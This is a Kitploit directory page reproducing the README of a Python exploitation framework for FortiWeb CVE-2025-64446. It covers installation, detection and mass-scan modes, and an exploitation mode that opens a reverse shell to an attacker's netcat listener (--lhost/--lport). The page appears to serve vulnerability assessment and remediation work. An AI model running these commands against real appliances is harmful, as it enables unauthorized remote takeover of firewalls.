Skip to content
KitploitKITPLOIT
ToolsExploitsBlog
Log in
Submit
ToolsExploitsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
FortiWeb-cve-2025-64446-RCE-exploit — Security research tool for FortiWeb CVE-2025-64446 vulnerability. Automated exploitation framework with advanced logging, real-time metrics, proxy debugging, and professional reporting. Includes retry logic, multi-threading, and configurable settings. For authorized security testing only. CVSS 9.8 Critical. | Kitploit
Tools/GitHubGitHub/cerberusmrxi/fortiweb-cve-2025-64446-rce-exploit
Vulnerability ScannersExploitationWeb Application ExploitationInformation GatheringWeb SecurityPenetration Testing
GitHubcerberusmrxi/fortiweb-cve-2025-64446-rce-exploit

FortiWeb-cve-2025-64446-RCE-exploit

View Repository
142 months agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →

About

Security research tool for FortiWeb CVE-2025-64446 vulnerability. Automated exploitation framework with advanced logging, real-time metrics, proxy debugging, and professional reporting. Includes retry logic, multi-threading, and configurable settings. For authorized security testing only. CVSS 9.8 Critical.

Share

FortiWeb CVE-2025-64446 RCE Exploit

Python License CVSS CVE Status Version

Professional security research & vulnerability assessment framework

Installation · Quick Start · Usage · Architecture · CLI Reference · Disclaimer


Overview

FortiWeb Research Tool is a Python assessment framework for authorized detection and analysis of CVE-2025-64446, a critical pre-authentication remote code execution issue affecting FortiWeb Web Application Firewall appliances.

AttributeDetail
AuthorSudeepa Wanigarathna
CVECVE-2025-64446
CVSS9.8 (Critical)
ClassAuthentication bypass + path traversal → arbitrary file upload → RCE
AffectedBuilds prior to 7.6.7 / 7.8.7 / 8.0.2 (verify against the official advisory)
RemediationUpgrade to a patched FortiWeb release
LanguagePython 3.7+
Entry pointexploit.py

Key capabilities

ModeFlag(s)Purpose
Detection--detect-onlyNon-exploitative vulnerability indicators
Safe / read-only--safe-modeSkip mutating exploit steps
Mass scan--targets + --scan-modeParallel multi-target assessment
Exploitation--target + --lhostControlled chain in authorized labs only
Dry run--dry-runExercise flow without applying changes
Reporting--output-dirJSON + HTML engagement reports

Vulnerability summary

FieldValue
CVE IDCVE-2025-64446
CVSS Score9.8 (Critical)
ImpactFull system compromise when successfully exploited
FixUpgrade to 7.6.7, 7.8.7, 8.0.2, or later

Always confirm affected/fixed versions against Fortinet PSIRT before engagement scoping.


📸 Screenshots

UsageScan Results
DashboardScan Results
Html Output
Terminal Output

Installation

git clone https://github.com/CerberusMrXi/FortiWeb-cve-2025-64446-RCE-exploit
cd FortiWeb-cve-2025-64446-RCE-exploit

python3 -m venv venv
source venv/bin/activate          # Linux / macOS
# venv\Scripts\activate           # Windows

pip install -r requirements.txt
python3 exploit.py --help

Dependencies

PackageRole
requests, urllib3HTTP client
rich, colorama, tqdmTerminal UI & progress
pyyamlconfig.yaml loading

Optional (dev): pytest, black, flake8, mypy, python-dotenv — see requirements.txt.


Quick start

# Vulnerability check only (recommended first)
python3 exploit.py --target https://192.168.1.100:8443 --detect-only

# Safe / read-only checks
python3 exploit.py --target https://192.168.1.100:8443 --safe-mode

# Mass scanning
python3 exploit.py --targets targets.txt --scan-mode --threads 10

# Authorized exploitation (requires listener host)
python3 exploit.py --target https://192.168.1.100:8443 --lhost 192.168.1.50 --lport 4444

Note: Exploitation mode requires --lhost. Use --detect-only or --safe-mode when you do not intend to run the full chain.


Usage guide

Detection mode

python3 exploit.py --target https://192.168.1.100:8443 --detect-only
python3 exploit.py --target https://192.168.1.100:8443 --detect-only --verbose
python3 exploit.py --target https://192.168.1.100:8443 --safe-mode
python3 exploit.py --target https://192.168.1.100:8443 --detect-only --timeout 30

Detection evaluates reachability, version hints, API exposure, path-traversal indicators, auth-bypass signals, and upload-endpoint accessibility. Risk is classified as Critical / High / Medium / Low from those indicators.

Mass scanning

cat > targets.txt << 'EOF'
https://192.168.1.100:8443
https://192.168.1.101:8443
https://192.168.1.102:8443
EOF

python3 exploit.py --targets targets.txt --scan-mode
python3 exploit.py --targets targets.txt --scan-mode --threads 20 --verbose
python3 exploit.py --targets targets.txt --scan-mode --output-dir ./reports

ScannerManager runs FortiWebScanner workers via a thread pool, prints a Rich summary table, and writes scan_report.json / scan_report.html.

Exploitation mode (authorized labs only)

# Start your listener first (example)
nc -lvnp 4444

python3 exploit.py --target https://192.168.1.100:8443 --lhost 192.168.1.50 --lport 4444
python3 exploit.py --target https://192.168.1.100:8443 --lhost 192.168.1.50 --lport 4444 --proxy http://127.0.0.1:8080
python3 exploit.py --target https://192.168.1.100:8443 --lhost 192.168.1.50 --lport 4444 --dry-run
python3 exploit.py --target https://192.168.1.100:8443 --lhost 192.168.1.50 --lport 4444 --user-agent "Research/1.0"

Configuration file

# config.yaml
target: https://192.168.1.100:8443
lhost: 192.168.1.50
lport: 4444
timeout: 15
threads: 5
verify_ssl: false
verbose: true
proxy: http://127.0.0.1:8080
user_agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36
output_dir: reports
log_dir: logs
detect_only: false
safe_mode: false
dry_run: false
python3 exploit.py --config config.yaml
python3 exploit.py --config config.yaml --target https://10.0.0.1:8443 --lport 9999

CLI flags override values loaded from YAML.


Architecture

exploit.py
├── ExploitConfig / ExploitResult / RequestMetrics   # dataclasses
├── LogManager                                       # exploit.log, errors.log, requests.log
├── Banner / StatusDisplay                           # Rich / colorama UI
├── FortiWebScanner                                  # detect-only checks (no exploit chain)
├── ScannerManager                                   # threaded multi-target scans + reports
├── FortiWebExploit                                  # single-target detect / exploit workflow
└── main()                                           # argparse + mode dispatch
ComponentResponsibility
FortiWebScannerReachability, version, CVE indicator checks
ScannerManagerParallel scans, JSON/HTML rollups, summary table
FortiWebExploitConfig-driven session, retries, metrics, reports, optional exploit path
LogManagerStructured file logging + colored console

High-level single-target flow:

  1. Banner / logging setup
  2. Reachability & version probe
  3. Indicator checks (or full chain when not in detect/safe mode)
  4. JSON + HTML report under reports/
  5. Cleanup where applicable

Features

Detection

  • Path-traversal indicator checks against management API paths
  • Authentication-bypass signal checks
  • FortiWeb version probing across common status/version endpoints
  • API endpoint exposure mapping
  • File-upload endpoint accessibility checks
  • Risk scoring from combined indicators

Reporting & observability

Download Tool